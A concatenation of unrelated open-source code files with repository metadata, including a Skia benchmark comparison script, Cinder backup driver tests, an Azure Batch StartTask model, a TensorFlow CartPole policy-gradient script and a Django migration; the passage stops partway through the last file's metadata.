threadRunner.wait()
suspects = get_suspects()
if len(suspects) == 0:
print(("%s and %s does not seem to have significant " + \
"performance differences.") % (args.a, args.b))
else:
suspects.sort(key = regression)
print("%s (compared to %s) is likely" % (args.a, args.b))
for suspect in suspects:
r = regression(suspect)
if r < 1:
print("\033[31m %s slower in %s\033[0m" % (format_r(1/r), suspect))
else:
print("\033[32m %s faster in %s\033[0m" % (format_r(r), suspect))
with open("%s/bench_%s_%s.json" % (args.outdir, args.a, args.b), 'w') as f:
results = {}
for bench in timesA:
r = regression(bench) if bench in suspects else 1.0
results[bench] = {
args.config: {
"signed_regression": normalize_r(r),
"lower_quantile_ms": get_lower_upper(timesA[bench])[0] * 1e-6,
"upper_quantile_ms": get_lower_upper(timesA[bench])[1] * 1e-6,
"options": {
# TODO(liyuqian): let ab.py call nanobench with --outResultsFile so
# nanobench could generate the json for us that's exactly the same
# as that being used by perf bots. Currently, we cannot guarantee
# that bench is the name (e.g., bench may have additional resolution
# information appended after name).
"name": bench
}
}
}
output = {"results": results}
if args.githash:
output["gitHash"] = args.githash
if args.keys:
keys = {}
for i in range(len(args.keys) / 2):
keys[args.keys[i * 2]] = args.keys[i * 2 + 1]
output["key"] = keys
f.write(json.dumps(output, indent=4))
print(("\033[36mJSON results available in %s\033[0m" % f.name))
with open("%s/bench_%s_%s.csv" % (args.outdir, args.a, args.b), 'w') as out:
out.write(("bench, significant?, raw regresion, " +
"%(A)s quantile (ns), %(B)s quantile (ns), " +
"%(A)s (ns), %(B)s (ns)\n") % {'A': args.a, 'B': args.b})
for bench in suspects + timesA.keys():
if (bench not in timesA or bench not in timesB):
continue
ta = timesA[bench]
tb = timesB[bench]
out.write(
"%s, %s, %f, " % (bench, bench in suspects, regression(bench)) +
' '.join(map(str, get_lower_upper(ta))) + ", " +
' '.join(map(str, get_lower_upper(tb))) + ", " +
("%s, %s\n" % (' '.join(map(str, ta)), ' '.join(map(str, tb))))
)
print(("\033[36m" +
"Compared %d benches. " +
"%d of them seem to be significantly differrent." +
"\033[0m") %
(len([x for x in timesA if x in timesB]), len(suspects)))
print("\033[36mPlease see detailed bench results in %s\033[0m" % out.name)
if __name__ == "__main__":
try:
test()
except Exception as e:
print(e)
print(HELP)
traceback.print_exc()
raise e
| {
"content_hash": "65661ba4bbccc2ef36cab9348f2cd8c1",
"timestamp": "",
"source": "github",
"line_count": 382,
"max_line_length": 80,
"avg_line_length": 29.829842931937172,
"alnum_prop": 0.604212373848179,
"repo_name": "google/skia",
"id": "9823f15b93d52bc7eb71242536e855801cc18066",
"size": "12262",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "tools/calmbench/ab.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "1277381"
},
{
"name": "Batchfile",
"bytes": "17474"
},
{
"name": "C",
"bytes": "6724920"
},
{
"name": "C#",
"bytes": "4683"
},
{
"name": "C++",
"bytes": "28759992"
},
{
"name": "CMake",
"bytes": "2850"
},
{
"name": "Cuda",
"bytes": "944096"
},
{
"name": "Dockerfile",
"bytes": "7142"
},
{
"name": "GLSL",
"bytes": "65328"
},
{
"name": "Go",
"bytes": "108521"
},
{
"name": "HTML",
"bytes": "1274414"
},
{
"name": "Java",
"bytes": "165376"
},
{
"name": "JavaScript",
"bytes": "110447"
},
{
"name": "Lex",
"bytes": "2458"
},
{
"name": "Lua",
"bytes": "70982"
},
{
"name": "Makefile",
"bytes": "10499"
},
{
"name": "Objective-C",
"bytes": "55140"
},
{
"name": "Objective-C++",
"bytes": "161861"
},
{
"name": "PHP",
"bytes": "128097"
},
{
"name": "Python",
"bytes": "1028767"
},
{
"name": "Shell",
"bytes": "63875"
}
],
"symlink_target": ""
} |
from oslo_log import log as logging
from aim import config as aim_cfg
from aim.tools.cli.groups import aimcli
from aim.tools.cli.commands import * # noqa
logging.register_options(aim_cfg.CONF)
aim = aimcli.aim
def run():
aim(auto_envvar_prefix='AIM')
if __name__ == '__main__':
run()
| {
"content_hash": "855a3fa0ca3ddad345718d4133236394",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 44,
"avg_line_length": 18.6875,
"alnum_prop": 0.6923076923076923,
"repo_name": "noironetworks/aci-integration-module",
"id": "015943ddf32b3b942ad21536f142cb3c7a4865c1",
"size": "932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aim/tools/cli/shell.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "1899856"
},
{
"name": "Roff",
"bytes": "437"
},
{
"name": "Shell",
"bytes": "2552"
}
],
"symlink_target": ""
} |
"""
Shows backlog count of ScheduledEmail
"""
from typing import Any
from django.core.management.base import BaseCommand
from django.utils.timezone import now as timezone_now
from zerver.models import ScheduledEmail
from datetime import timedelta
class Command(BaseCommand):
help = """Shows backlog count of ScheduledEmail
(The number of currently overdue (by at least a minute) email jobs)
This is run as part of the nagios health check for the deliver_email command.
Usage: ./manage.py print_email_delivery_backlog
"""
def handle(self, *args, **options):
# type: (*Any, **Any) -> None
print(ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now()-timedelta(minutes=1)).count())
| {
"content_hash": "91a55aef9d0b2093bb2d518b264bb7f5",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 82,
"avg_line_length": 28.423076923076923,
"alnum_prop": 0.7320703653585927,
"repo_name": "amanharitsh123/zulip",
"id": "8f9e5f94730c35c89fba08ef23adeb786d63f762",
"size": "763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zerver/management/commands/print_email_delivery_backlog.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "432211"
},
{
"name": "Emacs Lisp",
"bytes": "158"
},
{
"name": "HTML",
"bytes": "494378"
},
{
"name": "JavaScript",
"bytes": "2167185"
},
{
"name": "Nginx",
"bytes": "1485"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "401825"
},
{
"name": "Puppet",
"bytes": "86921"
},
{
"name": "Python",
"bytes": "3792729"
},
{
"name": "Ruby",
"bytes": "249744"
},
{
"name": "Shell",
"bytes": "61752"
}
],
"symlink_target": ""
} |
import os
import sys
import inspect
__version__ = 'git'
#{ Initialization
def _init_externals():
"""Initialize external projects by putting them into the path"""
if __version__ == 'git':
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'ext', 'gitdb'))
try:
import gitdb
except ImportError:
raise ImportError("'gitdb' could not be found in your PYTHONPATH")
# END verify import
#} END initialization
#################
_init_externals()
#################
#{ Imports
from git.config import GitConfigParser # @NoMove @IgnorePep8
from git.objects import * # @NoMove @IgnorePep8
from git.refs import * # @NoMove @IgnorePep8
from git.diff import * # @NoMove @IgnorePep8
from git.exc import * # @NoMove @IgnorePep8
from git.db import * # @NoMove @IgnorePep8
from git.cmd import Git # @NoMove @IgnorePep8
from git.repo import Repo # @NoMove @IgnorePep8
from git.remote import * # @NoMove @IgnorePep8
from git.index import * # @NoMove @IgnorePep8
from git.util import ( # @NoMove @IgnorePep8
LockFile,
BlockingLockFile,
Stats,
Actor
)
#} END imports
__all__ = [name for name, obj in locals().items()
if not (name.startswith('_') or inspect.ismodule(obj))]
| {
"content_hash": "b9d995bbbba13a27eb7c543ff1256bbe",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 83,
"avg_line_length": 29.208333333333332,
"alnum_prop": 0.5834522111269614,
"repo_name": "expobrain/GitPython",
"id": "58e4e7b65856be98b39745cad8a83fe7b058dfb8",
"size": "1663",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "git/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "561"
},
{
"name": "Python",
"bytes": "769647"
},
{
"name": "Shell",
"bytes": "367"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, "README.md"), encoding="utf-8") as f:
long_description = f.read()
setup(
name="Bernard J. Ortcutt",
version="0.4.0",
description="Reddit moderation automated through reports",
long_description=long_description,
url="https://github.com/leviroth/bernard",
author="Levi Roth",
author_email="[email protected]",
license="MIT",
classifiers=[
"Development Status :: 4 - Alpha",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
],
keywords="reddit moderation",
packages=find_packages(exclude=["contrib", "docs", "tests"]),
install_requires=[
"praw >= 5.0, <6.0",
"prawdditions >= 0.1.2, <0.1.3",
"pyyaml >=5.4, <6.0",
],
setup_requires=["pytest-runner >=2.1"],
tests_require=[
"betamax >=0.8, <0.9",
"betamax-matchers >=0.3.0, <0.4",
"betamax-serializers >=0.2, <0.3",
"pytest >=2.7.3",
],
test_suite="pytest",
)
| {
"content_hash": "bb8af6e2e9ec2e49cc9d58c446affe37",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 65,
"avg_line_length": 30.666666666666668,
"alnum_prop": 0.5970496894409938,
"repo_name": "leviroth/bernard",
"id": "e769f41fd3cf1f70b8b113a9a0f24aed450647d0",
"size": "1288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "43694"
}
],
"symlink_target": ""
} |
""" Tests for the backup service base driver. """
import uuid
import mock
from oslo_serialization import jsonutils
from cinder.backup import driver
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder import test
from cinder.tests.unit.backup import fake_service
_backup_db_fields = ['id', 'user_id', 'project_id',
'volume_id', 'host', 'availability_zone',
'display_name', 'display_description',
'container', 'status', 'fail_reason',
'service_metadata', 'service', 'size',
'object_count']
class BackupBaseDriverTestCase(test.TestCase):
def _create_volume_db_entry(self, id, size):
vol = {'id': id, 'size': size, 'status': 'available'}
return db.volume_create(self.ctxt, vol)['id']
def _create_backup_db_entry(self, backupid, volid, size,
userid='user-id', projectid='project-id'):
backup = {'id': backupid, 'size': size, 'volume_id': volid,
'user_id': userid, 'project_id': projectid}
return db.backup_create(self.ctxt, backup)['id']
def setUp(self):
super(BackupBaseDriverTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.volume_id = str(uuid.uuid4())
self.backup_id = str(uuid.uuid4())
self._create_backup_db_entry(self.backup_id, self.volume_id, 1)
self._create_volume_db_entry(self.volume_id, 1)
self.backup = objects.Backup.get_by_id(self.ctxt, self.backup_id)
self.driver = fake_service.FakeBackupService(self.ctxt)
def test_get_metadata(self):
json_metadata = self.driver.get_metadata(self.volume_id)
metadata = jsonutils.loads(json_metadata)
self.assertEqual(2, metadata['version'])
def test_put_metadata(self):
metadata = {'version': 1}
self.driver.put_metadata(self.volume_id, jsonutils.dumps(metadata))
def test_get_put_metadata(self):
json_metadata = self.driver.get_metadata(self.volume_id)
self.driver.put_metadata(self.volume_id, json_metadata)
def test_export_record(self):
export_record = self.driver.export_record(self.backup)
self.assertDictEqual({}, export_record)
def test_import_record(self):
export_record = {'key1': 'value1'}
self.assertIsNone(self.driver.import_record(self.backup,
export_record))
class BackupMetadataAPITestCase(test.TestCase):
def _create_volume_db_entry(self, id, size, display_name,
display_description):
vol = {'id': id, 'size': size, 'status': 'available',
'display_name': display_name,
'display_description': display_description}
return db.volume_create(self.ctxt, vol)['id']
def setUp(self):
super(BackupMetadataAPITestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.volume_id = str(uuid.uuid4())
self.volume_display_name = 'vol-1'
self.volume_display_description = 'test vol'
self._create_volume_db_entry(self.volume_id, 1,
self.volume_display_name,
self.volume_display_description)
self.bak_meta_api = driver.BackupMetadataAPI(self.ctxt)
def _add_metadata(self, vol_meta=False, vol_glance_meta=False):
if vol_meta:
# Add some VolumeMetadata
db.volume_metadata_update(self.ctxt, self.volume_id,
{'fee': 'fi'}, False)
db.volume_metadata_update(self.ctxt, self.volume_id,
{'fo': 'fum'}, False)
if vol_glance_meta:
# Add some GlanceMetadata
db.volume_glance_metadata_create(self.ctxt, self.volume_id,
'disk_format', 'bare')
db.volume_glance_metadata_create(self.ctxt, self.volume_id,
'container_type', 'ovf')
def test_get(self):
# Volume won't have anything other than base by default
meta = self.bak_meta_api.get(self.volume_id)
s1 = set(jsonutils.loads(meta).keys())
s2 = ['version', self.bak_meta_api.TYPE_TAG_VOL_BASE_META]
self.assertEqual(set(), s1.symmetric_difference(s2))
self._add_metadata(vol_glance_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
s1 = set(jsonutils.loads(meta).keys())
s2 = ['version', self.bak_meta_api.TYPE_TAG_VOL_BASE_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META]
self.assertEqual(set(), s1.symmetric_difference(s2))
self._add_metadata(vol_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
s1 = set(jsonutils.loads(meta).keys())
s2 = ['version', self.bak_meta_api.TYPE_TAG_VOL_BASE_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META,
self.bak_meta_api.TYPE_TAG_VOL_META]
self.assertEqual(set(), s1.symmetric_difference(s2))
def test_put(self):
meta = self.bak_meta_api.get(self.volume_id)
self.bak_meta_api.put(self.volume_id, meta)
self._add_metadata(vol_glance_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
self.bak_meta_api.put(self.volume_id, meta)
self._add_metadata(vol_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
self.bak_meta_api.put(self.volume_id, meta)
def test_put_invalid_version(self):
container = jsonutils.dumps({'version': 3})
self.assertRaises(exception.BackupMetadataUnsupportedVersion,
self.bak_meta_api.put, self.volume_id, container)
def test_v1_restore_factory(self):
fact = self.bak_meta_api._v1_restore_factory()
keys = [self.bak_meta_api.TYPE_TAG_VOL_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META]
self.assertEqual(set([]),
set(keys).symmetric_difference(set(fact.keys())))
meta_container = {self.bak_meta_api.TYPE_TAG_VOL_BASE_META:
{'display_name': 'vol-2',
'display_description': 'description'},
self.bak_meta_api.TYPE_TAG_VOL_META: {},
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META: {}}
for f in fact:
func = fact[f][0]
fields = fact[f][1]
func(meta_container[f], self.volume_id, fields)
vol = db.volume_get(self.ctxt, self.volume_id)
self.assertEqual(self.volume_display_name, vol['display_name'])
self.assertEqual(self.volume_display_description,
vol['display_description'])
def test_v2_restore_factory(self):
fact = self.bak_meta_api._v2_restore_factory()
keys = [self.bak_meta_api.TYPE_TAG_VOL_BASE_META,
self.bak_meta_api.TYPE_TAG_VOL_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META]
self.assertEqual(set([]),
set(keys).symmetric_difference(set(fact.keys())))
for f in fact:
func = fact[f][0]
fields = fact[f][1]
func({}, self.volume_id, fields)
def test_restore_vol_glance_meta(self):
# Fields is an empty list for _restore_vol_glance_meta method.
fields = []
container = {}
self.bak_meta_api._save_vol_glance_meta(container, self.volume_id)
self.bak_meta_api._restore_vol_glance_meta(container, self.volume_id,
fields)
self._add_metadata(vol_glance_meta=True)
self.bak_meta_api._save_vol_glance_meta(container, self.volume_id)
self.bak_meta_api._restore_vol_glance_meta(container, self.volume_id,
fields)
def test_restore_vol_meta(self):
# Fields is an empty list for _restore_vol_meta method.
fields = []
container = {}
self.bak_meta_api._save_vol_meta(container, self.volume_id)
# Extract volume metadata from container.
metadata = container.get('volume-metadata', {})
self.bak_meta_api._restore_vol_meta(metadata, self.volume_id,
fields)
self._add_metadata(vol_meta=True)
self.bak_meta_api._save_vol_meta(container, self.volume_id)
# Extract volume metadata from container.
metadata = container.get('volume-metadata', {})
self.bak_meta_api._restore_vol_meta(metadata, self.volume_id, fields)
def test_restore_vol_base_meta(self):
# Fields is a list with 'encryption_key_id' for
# _restore_vol_base_meta method.
fields = ['encryption_key_id']
container = {}
self.bak_meta_api._save_vol_base_meta(container, self.volume_id)
self.bak_meta_api._restore_vol_base_meta(container, self.volume_id,
fields)
def _create_encrypted_volume_db_entry(self, id, type_id, encrypted):
if encrypted:
vol = {'id': id, 'size': 1, 'status': 'available',
'volume_type_id': type_id, 'encryption_key_id': 'fake_id'}
else:
vol = {'id': id, 'size': 1, 'status': 'available',
'volume_type_id': type_id, 'encryption_key_id': None}
return db.volume_create(self.ctxt, vol)['id']
def test_restore_encrypted_vol_to_different_volume_type(self):
fields = ['encryption_key_id']
container = {}
# Create an encrypted volume
enc_vol1_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
# Create a second encrypted volume, of a different volume type
enc_vol2_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type2',
True)
# Backup the first volume and attempt to restore to the second
self.bak_meta_api._save_vol_base_meta(container, enc_vol1_id)
self.assertRaises(exception.EncryptedBackupOperationFailed,
self.bak_meta_api._restore_vol_base_meta,
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META],
enc_vol2_id, fields)
def test_restore_unencrypted_vol_to_different_volume_type(self):
fields = ['encryption_key_id']
container = {}
# Create an unencrypted volume
vol1_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'vol_type1',
False)
# Create a second unencrypted volume, of a different volume type
vol2_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'vol_type2',
False)
# Backup the first volume and restore to the second
self.bak_meta_api._save_vol_base_meta(container, vol1_id)
self.bak_meta_api._restore_vol_base_meta(
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META], vol2_id,
fields)
self.assertNotEqual(
db.volume_get(self.ctxt, vol1_id)['volume_type_id'],
db.volume_get(self.ctxt, vol2_id)['volume_type_id'])
def test_restore_encrypted_vol_to_same_volume_type(self):
fields = ['encryption_key_id']
container = {}
# Create an encrypted volume
enc_vol1_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
# Create an encrypted volume of the same type
enc_vol2_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
# Backup the first volume and restore to the second
self.bak_meta_api._save_vol_base_meta(container, enc_vol1_id)
self.bak_meta_api._restore_vol_base_meta(
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META], enc_vol2_id,
fields)
def test_restore_encrypted_vol_to_none_type_source_type_unavailable(self):
fields = ['encryption_key_id']
container = {}
enc_vol_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
undef_vol_id = self._create_encrypted_volume_db_entry(
str(uuid.uuid4()), None, False)
self.bak_meta_api._save_vol_base_meta(container, enc_vol_id)
self.assertRaises(exception.EncryptedBackupOperationFailed,
self.bak_meta_api._restore_vol_base_meta,
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META],
undef_vol_id, fields)
def test_restore_encrypted_vol_to_none_type_source_type_available(self):
fields = ['encryption_key_id']
container = {}
db.volume_type_create(self.ctxt, {'id': 'enc_vol_type_id',
'name': 'enc_vol_type'})
enc_vol_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type_id',
True)
undef_vol_id = self._create_encrypted_volume_db_entry(
str(uuid.uuid4()), None, False)
self.bak_meta_api._save_vol_base_meta(container, enc_vol_id)
self.bak_meta_api._restore_vol_base_meta(
container[self.bak_meta_api.TYPE_TAG_VOL_BASE_META], undef_vol_id,
fields)
self.assertEqual(
db.volume_get(self.ctxt, undef_vol_id)['volume_type_id'],
db.volume_get(self.ctxt, enc_vol_id)['volume_type_id'])
def test_filter(self):
metadata = {'a': 1, 'b': 2, 'c': 3}
self.assertEqual(metadata, self.bak_meta_api._filter(metadata, []))
self.assertEqual({'b': 2}, self.bak_meta_api._filter(metadata, ['b']))
self.assertEqual({}, self.bak_meta_api._filter(metadata, ['d']))
self.assertEqual({'a': 1, 'b': 2},
self.bak_meta_api._filter(metadata, ['a', 'b']))
def test_save_vol_glance_meta(self):
container = {}
self.bak_meta_api._save_vol_glance_meta(container, self.volume_id)
def test_save_vol_meta(self):
container = {}
self.bak_meta_api._save_vol_meta(container, self.volume_id)
def test_save_vol_base_meta(self):
container = {}
self.bak_meta_api._save_vol_base_meta(container, self.volume_id)
def test_is_serializable(self):
data = {'foo': 'bar'}
if self.bak_meta_api._is_serializable(data):
jsonutils.dumps(data)
def test_is_not_serializable(self):
data = {'foo': 'bar'}
with mock.patch.object(jsonutils, 'dumps') as mock_dumps:
mock_dumps.side_effect = TypeError
self.assertFalse(self.bak_meta_api._is_serializable(data))
mock_dumps.assert_called_once_with(data)
| {
"content_hash": "67aafd9b9841c1ea05b8d69230b4f041",
"timestamp": "",
"source": "github",
"line_count": 357,
"max_line_length": 79,
"avg_line_length": 44.37535014005602,
"alnum_prop": 0.5530867314732988,
"repo_name": "nexusriot/cinder",
"id": "95ca2b446ea1ff9b515a10464b1ffd591b703a86",
"size": "16471",
"binary": false,
"copies": "15",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/test_backup_driver_base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13069422"
},
{
"name": "Shell",
"bytes": "8222"
}
],
"symlink_target": ""
} |
from msrest.serialization import Model
class StartTask(Model):
"""A task which is run when a compute node joins a pool in the Azure Batch
service, or when the compute node is rebooted or reimaged.
:param command_line: The command line of the start task. The command line
does not run under a shell, and therefore cannot take advantage of shell
features such as environment variable expansion. If you want to take
advantage of such features, you should invoke the shell in the command
line, for example using "cmd /c MyCommand" in Windows or "/bin/sh -c
MyCommand" in Linux. Required if any other properties of the startTask are
specified.
:type command_line: str
:param resource_files: A list of files that the Batch service will
download to the compute node before running the command line.
:type resource_files: list[~azure.mgmt.batch.models.ResourceFile]
:param environment_settings: A list of environment variable settings for
the start task.
:type environment_settings:
list[~azure.mgmt.batch.models.EnvironmentSetting]
:param user_identity: The user identity under which the start task runs.
If omitted, the task runs as a non-administrative user unique to the task.
:type user_identity: ~azure.mgmt.batch.models.UserIdentity
:param max_task_retry_count: The maximum number of times the task may be
retried. The Batch service retries a task if its exit code is nonzero.
Note that this value specifically controls the number of retries. The
Batch service will try the task once, and may then retry up to this limit.
For example, if the maximum retry count is 3, Batch tries the task up to 4
times (one initial try and 3 retries). If the maximum retry count is 0,
the Batch service does not retry the task. If the maximum retry count is
-1, the Batch service retries the task without limit.
:type max_task_retry_count: int
:param wait_for_success: Whether the Batch service should wait for the
start task to complete successfully (that is, to exit with exit code 0)
before scheduling any tasks on the compute node. If true and the start
task fails on a compute node, the Batch service retries the start task up
to its maximum retry count (maxTaskRetryCount). If the task has still not
completed successfully after all retries, then the Batch service marks the
compute node unusable, and will not schedule tasks to it. This condition
can be detected via the node state and scheduling error detail. If false,
the Batch service will not wait for the start task to complete. In this
case, other tasks can start executing on the compute node while the start
task is still running; and even if the start task fails, new tasks will
continue to be scheduled on the node. The default is false.
:type wait_for_success: bool
"""
_attribute_map = {
'command_line': {'key': 'commandLine', 'type': 'str'},
'resource_files': {'key': 'resourceFiles', 'type': '[ResourceFile]'},
'environment_settings': {'key': 'environmentSettings', 'type': '[EnvironmentSetting]'},
'user_identity': {'key': 'userIdentity', 'type': 'UserIdentity'},
'max_task_retry_count': {'key': 'maxTaskRetryCount', 'type': 'int'},
'wait_for_success': {'key': 'waitForSuccess', 'type': 'bool'},
}
def __init__(self, command_line=None, resource_files=None, environment_settings=None, user_identity=None, max_task_retry_count=None, wait_for_success=None):
super(StartTask, self).__init__()
self.command_line = command_line
self.resource_files = resource_files
self.environment_settings = environment_settings
self.user_identity = user_identity
self.max_task_retry_count = max_task_retry_count
self.wait_for_success = wait_for_success
| {
"content_hash": "8b049f51ae63a0609488a8b2edc82b6c",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 160,
"avg_line_length": 59.24242424242424,
"alnum_prop": 0.710230179028133,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "fb42d05adbe72b04f93f021acd37fb1179d329fd",
"size": "4384",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-batch/azure/mgmt/batch/models/start_task.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
import tensorflow as tf # neural network for function approximation
import gym # environment
import numpy as np # matrix operation and math functions
from gym import wrappers
# GLOBAL SETTINGS
RNG_SEED = 2 # random number generator
ENVIRONMENT = "CartPole-v0"
# ENVIRONMENT = "CartPole-v1"
MAX_EPISODES = 1000
HIDDEN_LAYER = False
HIDDEN_SIZE = 6
DISPLAY_WEIGHTS = False # Help debug weight update
RENDER = True # Render the generation representative
EPISODE_INTERVAL = 100 # Generate a video at this interval
SESSION_FOLDER = "/home/yh/repo/sim_test/Feb/CartPoleData/"
gamma = 0.99 # Discount per step
alpha = 0.02205 # Learning rate
SUCCESS_THRESHOLD = 195
# SUCCESS_THRESHOLD = 475
CONSECUTIVE_TARGET = 100
# def record_interval(n):
# global EPISODE_INTERVAL
# return n % EPISODE_INTERVAL == 0
env = gym.make(ENVIRONMENT)
# env = wrappers.Monitor(env, SESSION_FOLDER)
env.seed(RNG_SEED)
np.random.seed(RNG_SEED)
tf.set_random_seed(RNG_SEED)
input_size = env.observation_space.shape[0]
try:
output_size = env.action_space.shape[0]
except AttributeError:
output_size = env.action_space.n
# Tensorflow network setup
x = tf.placeholder(tf.float32, shape=(None, input_size))
y = tf.placeholder(tf.float32, shape=(None, 1))
expected_returns = tf.placeholder(tf.float32, shape=(None, 1))
w_init = tf.contrib.layers.xavier_initializer()
if HIDDEN_LAYER:
hidden_W = tf.get_variable("W1", shape=[input_size, HIDDEN_SIZE],
initializer=w_init)
hidden_B = tf.Variable(tf.zeros(HIDDEN_SIZE))
dist_W = tf.get_variable("W2", shape=[HIDDEN_SIZE, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
hidden = tf.nn.elu(tf.matmul(x, hidden_W) + hidden_B)
dist = tf.tanh(tf.matmul(hidden, dist_W) + dist_B)
else:
dist_W = tf.get_variable("W1", shape=[input_size, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
dist = tf.tanh(tf.matmul(x, dist_W) + dist_B)
dist_soft = tf.nn.log_softmax(dist)
dist_in = tf.matmul(dist_soft, tf.Variable([[1.], [0.]]))
pi = tf.contrib.distributions.Bernoulli(dist_in)
pi_sample = pi.sample()
log_pi = pi.log_prob(y)
optimizer = tf.train.RMSPropOptimizer(alpha)
train = optimizer.minimize(-1.0 * expected_returns * log_pi)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
def run_episode(environment, render=False):
raw_reward = 0
discounted_reward = 0
cumulative_reward = []
discount = 1.0
states = []
actions = []
obs = environment.reset()
done = False
while not done:
states.append(obs)
cumulative_reward.append(discounted_reward)
if render:
obs.render()
action = sess.run(pi_sample, feed_dict={x: [obs]})[0]
actions.append(action)
obs, reward, done, info = env.step(action[0])
raw_reward += reward
if reward > 0:
discounted_reward += reward * discount
else:
discounted_reward += reward
discount *= gamma
return raw_reward, discounted_reward, cumulative_reward, states, actions
def display_weights(session):
global HIDDEN_LAYER
if HIDDEN_LAYER:
w1 = session.run(hidden_W)
b1 = session.run(hidden_B)
w2 = session.run(dist_W)
b2 = session.run(dist_B)
print(w1, b1, w2, b2)
else:
w1 = session.run(dist_W)
b1 = session.run(dist_B)
print(w1, b1)
returns = []
for ep in range(MAX_EPISODES):
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
returns.append(raw_G)
returns = returns[-CONSECUTIVE_TARGET:]
mean_returns = np.mean(returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
| {
"content_hash": "af7a6bd4a86c8cd838f48b9753080a43",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 76,
"avg_line_length": 31.85496183206107,
"alnum_prop": 0.6484543493889289,
"repo_name": "GitYiheng/reinforcement_learning_test",
"id": "1ff2f9e60a161e3b73b6631ebc3d9b3f8a59ef8c",
"size": "4173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test01_cartpendulum/Feb/t2_cartpole_mc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "14810"
},
{
"name": "HTML",
"bytes": "15405"
},
{
"name": "JavaScript",
"bytes": "51050"
},
{
"name": "Jupyter Notebook",
"bytes": "3492256"
},
{
"name": "Python",
"bytes": "1033931"
},
{
"name": "Shell",
"bytes": "3108"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('datastore', '0023_auto_20160525_2043'),
]
operations = [
migrations.RemoveField(
model_name='meterrun',
name='meter_type',
),
migrations.RemoveField(
model_name='projectrun',
name='meter_type',
),
migrations.AddField(
model_name='meterrun',
name='meter_class',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AddField(
model_name='meterrun',
name='meter_settings',
field=django.contrib.postgres.fields.jsonb.JSONField(null=True),
),
migrations.AddField(
model_name='projectrun',
name='meter_class',
field=models.CharField(default=b'DefaultResidentialMeter', max_length=250, null=True),
),
migrations.AddField(
model_name='projectrun',
name='meter_settings',
field=django.contrib.postgres.fields.jsonb.JSONField(null=True),
),
]
| {
"content_hash": "5183b9bdfb26077ec991ff7a13bdfa27",
